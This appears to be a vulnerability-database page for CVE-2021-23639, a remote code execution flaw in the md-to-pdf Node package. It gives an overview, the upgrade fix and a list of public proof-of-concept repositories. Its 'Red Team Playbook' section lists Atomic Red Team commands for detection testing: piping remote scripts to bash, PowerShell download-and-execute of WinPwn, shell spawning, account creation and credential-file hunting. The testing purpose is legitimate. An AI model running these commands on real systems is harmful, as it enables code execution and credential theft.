CVE-2021-23639
Overview
This vulnerability is a remote code execution flaw caused by the md-to-pdf package's use of the gray-matter library to parse front matter content without disabling its JavaScript execution engine. The vulnerability arises from the unsafe evaluation of embedded JavaScript within markdown front matter, allowing execution of arbitrary code. The affected component is the front matter parsing functionality in md-to-pdf versions prior to 5.0.0.
Vulnerability Description
The package md-to-pdf before 5.0.0 are vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content, without disabling the JS engine.
Impact
An unauthenticated attacker can exploit this vulnerability by supplying a malicious markdown file to md-to-pdf, triggering arbitrary code execution on the host system. No user interaction or privileges are required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can lead to full system compromise, data theft, or service disruption in environments where md-to-pdf processes untrusted markdown content.
Solution
Upgrade md-to-pdf to version 5.0.0 or later, where the gray-matter library's JavaScript engine is disabled by default to mitigate this vulnerability. Refer to the GitHub commit a716259c548c82fa1d3b14a3422e9100619d2d8a and the Snyk advisory (https://snyk.io/vuln/SNYK-JS-MDTOPDF-1657880) for detailed patch information and upgrade instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the markdown-to-pdf package arises from its reliance on the gray-matter library for parsing front matter content. This library, when configured improperly, allows for the execution of arbitrary JavaScript code. The core issue stems from the fact that the JavaScript engine is not disabled during the parsing process, which creates an opportunity for attackers to inject malicious scripts. This oversight can lead to remote code execution (RCE), enabling an attacker to execute arbitrary commands on the server where the markdown-to-pdf package is deployed. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to systems utilizing this package.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a specially designed markdown file containing malicious front matter, which, when processed by the markdown-to-pdf package, would trigger the execution of the embedded JavaScript. This could be achieved through social engineering tactics, such as tricking a user into uploading a compromised markdown file, or by directly targeting applications that automatically process user-generated content. Once the malicious code is executed, the attacker could gain control over the server, leading to unauthorized access to sensitive data, system manipulation, or further propagation of the attack within the network.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on markdown-to-pdf for document generation. The potential for remote code execution poses a serious business risk, as it could lead to data breaches, loss of intellectual property, and reputational damage. Furthermore, the ability of an attacker to execute arbitrary code could facilitate lateral movement within the network, allowing them to compromise additional systems and escalate privileges. Organizations that fail to address this vulnerability may face regulatory penalties, legal liabilities, and increased scrutiny from stakeholders, all of which can have long-lasting effects on their operations.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of their software dependencies to identify any instances of the markdown-to-pdf package that are vulnerable. Regularly updating to the latest version of the package is crucial, as version 5.0.0 and later address this security flaw by disabling the JavaScript engine during parsing. Additionally, implementing robust input validation and sanitization practices can help prevent the execution of malicious code. Organizations should also consider employing security tools that can analyze and monitor the behavior of applications for signs of exploitation, such as unusual file access patterns or unexpected command execution.
In conclusion, the vulnerability within the markdown-to-pdf package represents a critical threat to organizations that utilize this tool for document generation. The potential for remote code execution through improperly parsed front matter content can lead to severe consequences, including data breaches and system compromise. By understanding the technical details of the vulnerability, recognizing potential attack vectors, and implementing effective detection and mitigation strategies, organizations can significantly reduce their risk and enhance their overall security posture. It is imperative for businesses to remain vigilant and proactive in addressing such vulnerabilities to safeguard their assets and maintain trust with their customers and stakeholders.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Markdown To Pdf Project | Markdown To Pdf | All |
cpe:2.3:a:markdown_to_pdf_project:markdown_to_pdf:*:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
MohandAcherir/CVE-2021-23639
Exploit of CVE-2021-23639 for the vulnerable library 'md-to-pdf' in JS
|
MohandAcherir | 0 | 1 | 2024-10-04 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-23639 |
| snyk.io |
GitHub CVE
x_refsource_MISC
|
https://snyk.io/vuln/SNYK-JS-MDTOPDF-1657880 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/simonhaenisch/md-to-pdf/issues/99 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/simonhaenisch/md-to-pdf/commit/a716259c548c82fa1d3b14a3422e9100619d2d8a |